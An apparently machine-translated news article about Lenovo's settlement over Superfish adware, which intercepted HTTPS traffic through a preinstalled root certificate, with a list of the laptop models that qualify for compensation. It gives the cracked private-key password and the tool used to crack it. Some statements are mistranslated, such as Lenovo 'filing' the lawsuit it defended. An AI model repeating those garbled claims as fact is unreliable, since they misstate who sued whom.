Lenovo will pay laptop owners compensation of $ 8.3 million for installing Superfish malware
CA-certificate Superfish in the Windows key store
In February 2015, Lenovo was found to have installed VisualDiscovery malware developed by Superfish on laptops. On closer examination, this turned out to be a typical malware that listens for traffic, analyzes search queries and injects advertisements on the pages of third-party sites. The application intercepts, including, HTTPS traffic. To do this, it installs the Superfish root CA certificate in the Windows keystore (with the private key to it) and proxies all traffic between the host and the browser, replacing the certificate with its own. A simple brute force on a dictionary of 2203 words with the help of a certificate cracker pemcrack identified the password for the private key komodia .
In general, the story came out extremely unpleasant. It turned out that this malware has been installed on Lenovo laptops since September 2014.
Further investigation revealed that a total of malware was installed on 750,000 laptops of the following models: E-Series, Edge Series, Flex-Series, G-Series, Miix Series, S-Series, U-Series, Y-Series, Yoga Series and Z-Series.
The malware not only interfered with the user's encrypted traffic, but thanks to the private key of the certificate with a simple password, it potentially provided an opportunity for a MitM attack to a third-party attacker, which compromises the confidentiality of information, including financial data, and so on.
The private key for the CA certificate Superfish
After the outbreak of scandal, Lenovo has posted a toolto automatically remove Superfish and manual removal instructions. But it did not save her from punishment. First, the retribution came in the form of a hacker attack with Lenovo.com deface , and now the Chinese company has been forced to pay compensation to the affected laptop owners.
Lenovo filed a class action lawsuit (PDF) with the Federal District Court for the Northern District of California to claim compensation, and on November 21, 2018, the court granted these claims in advance.
However, the case did not reach the payment of compensation established by the court, because Lenovo had reached an agreement with representatives of the claimant about the pre-trial compensation in the amount of $ 7.3 million. This amount is added to the previous $ 1 million compensation that Lenovo has already allocated. Thus, the total amount of the fund to pay compensation to affected American users is now $ 8.3 million.
It should be noted that Lenovo has long disagreed with the plaintiff’s claims on the grounds that it “is not aware of the use of the Superfish program by third parties.” She remained unconvinced, but expressed satisfaction that this 2.5-year process was finally over. This is stated in the official (already remote) press release .
Perhaps the fund will have to deduct the cost of legal services to the process. If we divide the compensation into all 750,000 affected users, then everyone would get only about $ 10. In principle, this is very little for installing a MitM proxy with the introduction of advertising: for example, Amazon gives a discount of $ 20 on its Kindle, if the user agrees to view ads. So $ 10 per person is very small and even beneficial for Lenovo. Except for damage to reputation.
But in practice, the amount of compensation payments can be much less than 750,000, so payments will be more than $ 10. Compensation is provided only for those who in the period from September 1, 2014 to February 28, 2015 bought the following models of laptops in the United States:
- G Series: G410, G510, G710, G40-70, G50-70, G40-30, G50-30, G50-45
- U Series: U430P, U430Touch, U530Touch
- Y Series: Y40-70, Y50-70
- Z Series: Z50-75, Z40-70, Z50-70
- Flex Series: Flex2 14D, Flex2 15D, Flex2 14, Flex2 15, Flex2 15 (BTM), Flex 10
- MIIX Series: MIIX2-10, MIIX2-11
- YOGA Series: YOGA2Pro-13, YOGA2-13, YOGA2-11BTM, YOGA2-11HSW
The exact amount of compensation depends on the number of users who apply to the fund. In addition to this money, earlier Lenovo has already paid two fines of $ 3.5 million in agreement with the Federal Trade Commission and the authorities of 32 states.
In Russia, as far as is known, no class action was filed against Russia, so no compensation for damage was provided.